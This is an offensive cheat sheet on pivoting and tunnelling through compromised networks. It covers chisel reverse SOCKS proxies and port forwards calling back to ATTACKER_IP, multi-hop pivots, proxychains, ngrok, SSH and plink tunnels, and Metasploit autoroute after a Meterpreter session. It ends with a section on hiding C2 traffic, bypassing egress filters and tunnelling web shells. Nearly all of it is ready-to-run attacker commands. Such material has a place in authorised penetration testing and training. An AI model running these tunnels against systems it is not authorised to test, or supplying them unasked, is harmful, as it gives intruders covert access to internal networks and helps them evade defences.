For C2-integrated pivoting (Cobalt Strike/Sliver SOCKS, PortBender, Ligolo-ng in a campaign context), see c. Lateral Movement & Pivoting.
SSH Tunnels
# Local port forward via bastion
ssh -L 127.0.0.1:6443:finaltarget:targetport user@jumpserver
# Forward local traffic to remote web server
ssh -L 8080:webserver:80 webserver
# General format
ssh -L local_port:remote_address:remote_port username@server.com
# Reverse tunnel (remote host connects to you)
ssh -R 43022:localhost:22 user@target.localChisel
https://github.com/jpillora/chisel
Reverse SOCKS Proxy Client (target) connects out to server (attacker), allowing pivot to target network.
# --- Attacker ---
# Listens for a reverse connection on port 9999
chisel server -p 9999 --reverse
# --- Target ---
# Connects to attacker, 'R:socks' tells the server to open a SOCKS proxy
chisel client ATTACKER_IP:9999 R:socks
# --- Attacker Usage ---
# A SOCKS5 proxy is now running on your machine at 127.0.0.1:1080.
# Add 'socks5 127.0.0.1 1080' to /etc/proxychains4.conf
#
# proxychains nmap -sT 10.1.1.10 -p 80,445
# Can also use authentication for OpSec
# --- Attacker ---
# Listens on 9999, --reverse, and requires --auth
chisel server -p 9999 --reverse --auth "chisel-user:SecurePass123!"
# --- Target ---
# Connects to attacker with the correct --auth string, requests SOCKS proxy
chisel client --auth "chisel-user:SecurePass123!" ATTACKER_IP:9999 R:socks
# --- Attacker Usage ---
# Proxy is now running on 127.0.0.1:1080Forward SOCKS Proxy Useful if you have direct network access to the target. Your attacker machine connects in to the target, opening a SOCKS proxy on your machine.
# --- Target ---
# Listens for a forward connection on port 9999
chisel server -p 9999
# --- Attacker ---
# Connects to target, 'socks' opens a local SOCKS proxy at 127.0.0.1:1080
chisel client TARGET_IP:9999 socks
# --- Attacker Usage ---
# A SOCKS5 proxy is now running on your machine at 127.0.0.1:1080.
#
# proxychains curl http://10.1.1.20Reverse Port Forward The target connects out to your attacker machine, forwarding one of its local ports (e.g., SSH) to a port on your machine.
# --- Attacker ---
# Listens for a reverse connection on port 9999
chisel server -p 9999 --reverse
# --- Target ---
# Connects to attacker, tells server to listen on port 4444
# and forward all traffic to the client's localhost:22
chisel client ATTACKER_IP:9999 R:4444:localhost:22
# --- Attacker Usage ---
# You can now SSH to the target by connecting to your *own* local port 4444
#
# ssh user@127.0.0.1 -p 4444Forward Port Forward Your attacker machine connects in to the target and forwards a local port (e.g., 8080) to an internal service on the target’s network.
# --- Target ---
# Listens for a forward connection on port 9999
chisel server -p 9999
# --- Attacker ---
# Connects to target, listens on local 8080
# and forwards traffic to 10.1.1.10:80 (via the target)
chisel client TARGET_IP:9999 L:8080:10.1.1.10:80
# --- Attacker Usage ---
# Open your local browser to http://127.0.0.1:8080
# to access the internal web server at 10.1.1.10:80UDP Port Forward The target connects out to your attacker machine to forward an internal UDP service (like DNS).
# --- Attacker ---
# The server *must* be started with the --udp flag
chisel server -p 9999 --reverse --udp
# --- Target ---
# R:udp: specifies the remote forward is for UDP
# Forwards attacker's UDP 5353 to internal DNS server 10.1.1.5:53
chisel client ATTACKER_IP:9999 R:udp:5353:10.1.1.5:53
# --- Attacker Usage ---
# You can now query the internal DNS server via your local port 5353
#
# dig @127.0.0.1 -p 5353 internal.corp.localMulti-hop Pivot (Reverse SOCKS) Chains a SOCKS proxy from Pivot 2 (deep network) through Pivot 1 (DMZ) to your Attacker machine.
# Goal: Attacker <--> Pivot 1 <--> Pivot 2 --> Internal Network
# --- On Attacker ---
# Listens for Pivot 1 on port 9999
chisel server -p 9999 --reverse
# --- On Pivot 1 ---
# 1. Connects OUT to Attacker (ATTACKER_IP)
# 2. Tells Attacker to listen on port 8000
# 3. Forwards traffic from Attacker:8000 to its OWN port 8001
chisel client ATTACKER_IP:9999 R:8000:127.0.0.1:8001
# 4. Also runs a server to listen IN from Pivot 2
chisel server -p 8001 --reverse
# --- On Pivot 2 ---
# Connects OUT to Pivot 1's server on port 8001
# 'R:socks' tells Pivot 1's server to create the SOCKS proxy
chisel client 127.0.0.1:8001 R:socks
# --- Attacker Usage ---
# The SOCKS proxy from Pivot 2 is now chained back and accessible
# on your Attacker machine at 127.0.0.1:8000
#
# Update /etc/proxychains4.conf to use: socks5 127.0.0.1 8000Proxychains
https://github.com/haad/proxychains
# Configure /etc/proxychains.conf to use SOCKS5 proxy
socks5 127.0.0.1 1080
# Tunnel any tool through SOCKS proxy (e.g., Tor, chisel, socks_proxy)
proxychains nmap -sT -Pn -p 80 target.com
proxychains curl http://example.comDev Tunnel (Microsoft Azure)
https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/get-started?tabs=windows
# Requires Microsoft account and dev tunnel extension for Azure CLI
az dev-tunnel create --port 8080 --allow-anonymous
az dev-tunnel hostNgrok
# Expose local HTTP server on port 8080 to public internet
ngrok http 8080
# Forward TCP port (e.g., SSH)
ngrok tcp 22srelay
https://github.com/hirochachacha/srelay
# Simple SOCKS4 proxy
srelay -i 127.0.0.1 -p 1080
# Use with proxychains
proxychains -f proxychains.conf curl http://target.comPlink (PuTTY CLI Tool)
# Create reverse tunnel (remote forwards a port back to you)
plink.exe -R 9999:localhost:22 user@remotehost
# Forward local port to remote
plink.exe -L 8080:localhost:80 user@remotehostMetasploit Tunneling (AutoRoute & Socks Proxy)
# After Meterpreter session is open
run autoroute -s 192.168.1.0/24
# Set up SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
# Use with proxychains or browser
proxychains curl http://internal.hostTunneling for Evasion
# Obfuscate C2 and pivot traffic through encrypted or alternate channels:
# Use `chisel` in reverse mode with TLS
chisel server --tls-cert cert.pem --tls-key key.pem -p 9999 --reverse
# Use `socat` to wrap arbitrary traffic in SSL
socat TCP-LISTEN:443,reuseaddr,fork OPENSSL:targethost:4444,verify=0
# SSH over non-standard ports (bypass egress filters)
ssh -p 443 -L 8080:targethost:80 user@host
# Ngrok to tunnel web shells or C2 traffic
ngrok http 8080